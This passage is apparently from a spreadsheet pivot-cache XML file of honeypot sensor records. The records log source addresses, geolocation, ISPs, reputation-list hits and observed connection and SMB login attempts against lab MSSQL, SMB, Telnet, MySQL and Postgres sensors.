    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70a6:b39c"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1455"/>
    <x v="1455"/>
    <s v="NA&amp;&amp;138-99-108-108.wspfibra.com.br"/>
    <x v="0"/>
    <d v="2025-04-16T18:08:01"/>
    <d v="2024-07-12T01:12:00"/>
    <d v="2025-04-16T18:08:01"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H22"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MT"/>
    <s v="Mato Grosso"/>
    <s v="Campos de Júlio"/>
    <s v="Campos de Júlio"/>
    <s v="12978169"/>
    <s v="NA"/>
    <s v="-13.7245"/>
    <s v="-59.2603"/>
    <s v="52747"/>
    <s v="Wsp Serviços de Telecomunicações Ltda"/>
    <s v="Wsp Serviços de Telecomunicações Ltda"/>
    <s v="business"/>
    <s v="Wsp Serviços de Telecomunicações Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (138.99.108.108,64316)}&amp;&amp;{Data_SMB:Incoming connection (138.99.108.108,63225)}&amp;&amp;{Data_SMB:Incoming connection (138.99.108.108,63896)}&amp;&amp;{Data_SMB:Incoming connection (138.99.108.108,52472)}&amp;&amp;{Data_SMB:Incoming connection (138.99.108.108,52748)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2025-02-07 00:00:00"/>
    <s v="2027-02-07 00:00:00"/>
    <s v="2025-02-21 00:00:00"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['20250414 DSOK', 'published']"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8a63:6c6c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1456"/>
    <x v="1456"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T18:06:15"/>
    <d v="2025-04-16T18:05:17"/>
    <d v="2025-04-16T18:06:15"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="143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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c7:2b66"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1457"/>
    <x v="1457"/>
    <s v="220-133-104-68.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T17:56:41"/>
    <d v="2025-04-16T16:43:22"/>
    <d v="2025-04-16T17:56:41"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40"/>
    <s v="23"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:6844"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1458"/>
    <x v="1458"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T17:29:55"/>
    <d v="2025-04-16T11:08:00"/>
    <d v="2025-04-16T17:29:55"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_POSTGRES_HC1"/>
    <s v="3306&amp;&amp;5432"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NJ"/>
    <s v="New Jersey"/>
    <s v="Hudson"/>
    <s v="North Bergen"/>
    <s v="5101879"/>
    <s v="07047"/>
    <s v="40.8054"/>
    <s v="-74.0241"/>
    <s v="14061"/>
    <s v="DigitalOcean, LLC"/>
    <s v="DigitalOcean, LLC"/>
    <s v="hosting"/>
    <s v="DigitalOcean, LLC"/>
    <s v="2021-10-14"/>
    <s v="DO-13"/>
    <s v="2021-10-14"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_POSTGRES:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:92be:4dcf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1459"/>
    <x v="1459"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T17:29:14"/>
    <d v="2025-04-16T17:27:50"/>
    <d v="2025-04-16T17:29:14"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71a3:37cf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1460"/>
    <x v="1460"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T17:24:51"/>
    <d v="2025-04-16T07:04:58"/>
    <d v="2025-04-16T17:24:51"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5f:5358"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1461"/>
    <x v="1461"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T17:23:29"/>
    <d v="2025-04-16T17:23:29"/>
    <d v="2025-04-16T17:23:29"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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3b62:b87b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1462"/>
    <x v="1462"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T17:22:57"/>
    <d v="2025-03-05T17:08:54"/>
    <d v="2025-04-16T17:22:57"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="NA"/>
    <s v="12.9719"/>
    <s v="77.5937"/>
    <s v="55947"/>
    <s v="Bangalore Broadband Network Pvt Ltd"/>
    <s v="Bangalore Broadband Network PVT LTD"/>
    <s v="residential"/>
    <s v="BBNL"/>
    <s v="2011-09-21"/>
    <s v="BBNL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6705:841d"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1463"/>
    <x v="1463"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T17:18:22"/>
    <d v="2025-04-16T07:09:33"/>
    <d v="2025-04-16T17:18:22"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:49b5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1464"/>
    <x v="1464"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T17:17:18"/>
    <d v="2025-04-16T17:17:18"/>
    <d v="2025-04-16T17:17:18"/>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7:1361"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1465"/>
    <x v="1465"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T16:29:41"/>
    <d v="2025-02-25T14:47:54"/>
    <d v="2025-04-16T16:29:41"/>
    <n v="89"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H26"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2001-12-27"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,53178)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,53326)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,53482)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,53641)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,53765)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,53901)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,54030)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,54158)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,54265)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,54370)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,54675)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,54797)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,56761)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,56904)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,57073)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,57232)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,57388)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,57536)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,57675)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,57799)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,57938)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,58082)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,58220)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,58362)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,58523)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,58659)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,58825)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,59001)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,59135)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,59290)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d02:2d1c"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1466"/>
    <x v="1466"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T16:29:40"/>
    <d v="2025-04-16T16:29:40"/>
    <d v="2025-04-16T16:29:40"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b63b:e699"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1467"/>
    <x v="1467"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T16:26:54"/>
    <d v="2023-12-01T14:06:00"/>
    <d v="2025-04-16T16:26:54"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="55049&amp;&amp;3306&amp;&amp;1433&amp;&amp;62080&amp;&amp;64165&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Ludhiana"/>
    <s v="1264728"/>
    <s v="141001"/>
    <s v="30.8915"/>
    <s v="75.802"/>
    <s v="133661"/>
    <s v="Netplus Broadband Services Private Limited"/>
    <s v="Netplus Broadband Services Private Limited"/>
    <s v="residential"/>
    <s v="Netplus Broadband Services Private Limited"/>
    <s v="2015-12-01"/>
    <s v="NETPLUS"/>
    <s v="None"/>
    <s v="None&amp;&amp;connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (175.176.186.157,64184)}&amp;&amp;{Data_SMB:Incoming connection (175.176.186.157,62146)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:afb0:ba9d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1468"/>
    <x v="1468"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T16:16:09"/>
    <d v="2025-04-16T16:16:09"/>
    <d v="2025-04-16T16:16:09"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Thrissur"/>
    <s v="Thrissur"/>
    <s v="1254187"/>
    <s v="680001"/>
    <s v="10.5276"/>
    <s v="76.2144"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75dd:9c45"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1469"/>
    <x v="1469"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T16:10:51"/>
    <d v="2025-04-16T05:43:59"/>
    <d v="2025-04-16T16:10:51"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c7:c1b8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1470"/>
    <x v="1470"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T15:59:16"/>
    <d v="2025-04-16T15:40:25"/>
    <d v="2025-04-16T15:59:16"/>
    <n v="21"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d7:665f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1471"/>
    <x v="1471"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T15:43:06"/>
    <d v="2025-04-16T03:35:54"/>
    <d v="2025-04-16T15:43:06"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
